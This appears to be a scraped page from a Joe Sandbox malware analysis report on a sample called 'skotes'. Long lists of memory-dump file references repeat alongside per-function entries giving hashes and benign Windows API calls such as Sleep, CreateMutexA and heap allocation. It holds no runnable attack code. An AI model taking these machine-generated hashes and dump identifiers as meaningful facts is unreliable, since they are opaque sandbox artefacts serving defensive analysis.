Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a833241dc84988bbdda49dc2ec6643c676087a3d208788bcf70dea2f2d15a6b2
Instruction ID: 507ba8ac0f90e2f97025732a4e57d1b63e53bc0038cf7aa1c3df4f580ccd6a9c
Opcode Fuzzy Hash: a833241dc84988bbdda49dc2ec6643c676087a3d208788bcf70dea2f2d15a6b2
Instruction Fuzzy Hash: A42149327442009BFB189B68EC8AF6DF766EBC1310F248219E918D76D5D77999808752

Function 0094A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 37b566507b83f59cba0d54582bf6684aa6381edcde5071ff3b615d23cb693b29
Instruction ID: bac4384c7bcfe94b067f2bd852de6cbd8288c64726361b77005cbc8ed9ca44c0
Opcode Fuzzy Hash: 37b566507b83f59cba0d54582bf6684aa6381edcde5071ff3b615d23cb693b29
Instruction Fuzzy Hash: AA217F316D82018AFB2467B99C97F7EB356DFC1300F244916E504D63D1DB7A494192A3

Function 0094A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7dc7f364f8fe0c5b0b148652145d461a47a191ee1b5d4d27f0a5377e42c63dc8
Instruction ID: fc8201ef9205e4444a4f0c22862b025decedbe3196d9693a8aaaa65600681e52
Opcode Fuzzy Hash: 7dc7f364f8fe0c5b0b148652145d461a47a191ee1b5d4d27f0a5377e42c63dc8
Instruction Fuzzy Hash: A8219B323842009BFB18DF68EC86B6DF766DFD2310F248219E914D7BD1D7795A808752

Function 0097D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0097A813,00000001,00000364,00000006,000000FF,?,0097EE3F,?,00000004,00000000,?,?), ref: 0097D870

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fe27ef36f58e8a007768b18397128d541eae5980f732cdbe8c038e1a4aabfb10
Instruction ID: 50c351bb8c38e24758850b3d8b117eb43a41b05c357916102a99a16894cdcf72
Opcode Fuzzy Hash: fe27ef36f58e8a007768b18397128d541eae5980f732cdbe8c038e1a4aabfb10
Instruction Fuzzy Hash: BBF08233647225A6EB217AB69C01BDB777DDFC2770B29C521BC0CA7591DA20EC0086E2

Non-executed Functions

Function 00942EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00942F5F
GetCurrentThreadId.KERNEL32 ref: 00942F7E
__Mtx_unlock.LIBCPMT ref: 00942FCC
__Cnd_broadcast.LIBCPMT ref: 00942FE3
__Mtx_unlock.LIBCPMT ref: 009430F5
GetCurrentThreadId.KERNEL32 ref: 00943132
__Mtx_unlock.LIBCPMT ref: 0094319B

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 7b148c2b003a97e8dea58f50b479de28e2281468cc8c79e687fd16a7839bb334
Instruction ID: 6b5e46f16925be7a7e3cb63c6c2965e6b8f67c98710171b3e1068cc5c0adc39c
